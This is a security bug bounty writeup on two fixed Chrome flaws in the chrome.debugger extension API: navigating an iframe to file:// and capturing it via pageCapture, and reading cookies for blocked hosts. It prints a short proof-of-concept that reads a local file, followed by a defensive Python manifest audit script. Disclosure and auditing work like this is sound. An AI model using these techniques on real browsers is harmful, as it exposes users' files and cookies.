Writeups

The Chrome extension chrome.debugger API (https://developer.chrome.com/docs/extensions/reference/api/debugger) implies the <all_urls> permission, but it should not grant access to the user's file system or bypass enterprise policies. The underlying DevTools protocol is, however, very powerful by design and exposes a large number of features (https://chromedevtools.github.io/devtools-protocol/).

‘Page.navigate’ could navigate iframes to file:// when not enabled (Awarded $3000)

Extensions with both pageCapture and debugger permissions could read local file contents. This is because it’s possible to use Page.navigate to navigate an iframe to file:// when “Allow access to file URLs” is disabled, exposing the file’s contents to the pageCapture API.

// Attach the DevTools protocol (version 1.3) to the target tab; the callback logs the result.
chrome.debugger.attach({tabId: <TARGET>}, '1.3', console.log);
// Navigate a child frame (not the top frame) to a file:// URL. The frameId is taken
// from earlier Page events; file access is otherwise disabled for this extension.
chrome.debugger.sendCommand({tabId: <TARGET>}, 'Page.navigate', {frameId: <FRAME ID AS SEEN FROM EVENTS>, url: 'file:///d:/demo.txt'}, console.log);
// Serialize the whole tab, including the file-backed iframe, as MHTML.
chrome.pageCapture.saveAsMHTML({tabId: <TARGET>}, console.log);

This issue was fixed in https://issues.chromium.org/40060173

Features bypass the runtime_blocked_hosts cookie protection (Awarded $3000)

Extensions were able to read cookies for a host listed in runtime_blocked_hosts through the chrome.debugger API, using Storage.getCookies (https://chromedevtools.github.io/devtools-protocol/tot/Storage/#method-getCookies) and other protocol features.
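Both findings above come down to one permission: an extension holding debugger gets DevTools protocol access that neither the file-URL switch nor runtime_blocked_hosts bounded. The audit below is an added example, not part of the original writeup or of Chrome: it scans extension manifests for the debugger permission and flags the debugger + pageCapture combination from the first bug. The sample manifests are constructed; the combination rule is this example's own, not a Chrome policy.

```python
import json
from pathlib import Path

# Finding texts follow the two bugs described in the writeup.
DEBUGGER_NOTE = ("debugger: DevTools protocol access implies <all_urls> and, per the "
                 "writeup, was not bounded by runtime_blocked_hosts")
FILE_READ_NOTE = ("debugger + pageCapture: Page.navigate to file:// followed by "
                  "saveAsMHTML could expose local file contents")


def audit_manifest(manifest: dict) -> list[str]:
    """Return findings for one parsed manifest.json. Both 'permissions' and
    'optional_permissions' count, since an optional grant is still a grant."""
    perms = set(manifest.get("permissions", [])) | set(manifest.get("optional_permissions", []))
    findings = []
    if "debugger" in perms:
        findings.append(DEBUGGER_NOTE)
        if "pageCapture" in perms:
            findings.append(FILE_READ_NOTE)
    return findings


def audit_extensions(root: Path) -> dict[str, list[str]]:
    """Walk a profile's Extensions directory (Extensions/<id>/<version>/manifest.json)
    and report, keyed by extension id, only the extensions that have findings."""
    report = {}
    for manifest_path in root.glob("*/*/manifest.json"):
        try:
            manifest = json.loads(manifest_path.read_text(encoding="utf-8"))
        except (OSError, json.JSONDecodeError):
            continue  # unreadable or malformed manifest: skip it rather than abort the audit
        findings = audit_manifest(manifest)
        if findings:
            report[manifest_path.parent.parent.name] = findings
    return report


# Constructed sample manifests (not real extensions).
SAMPLE_MANIFESTS = {
    "benign": {"manifest_version": 3, "permissions": ["storage"]},
    "debug_only": {"manifest_version": 3, "permissions": ["debugger"]},
    "file_reader": {"manifest_version": 3, "permissions": ["debugger", "pageCapture"]},
    "optional": {"manifest_version": 3, "permissions": ["tabs"], "optional_permissions": ["debugger"]},
}

if __name__ == "__main__":
    for name, manifest in SAMPLE_MANIFESTS.items():
        print(name, audit_manifest(manifest))
```

Pointing audit_extensions at a real profile's Extensions directory lists the extensions an administrator would want to review or block via the debugger permission.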

Setup

Exploit

Using a browser extension with the debugger permission.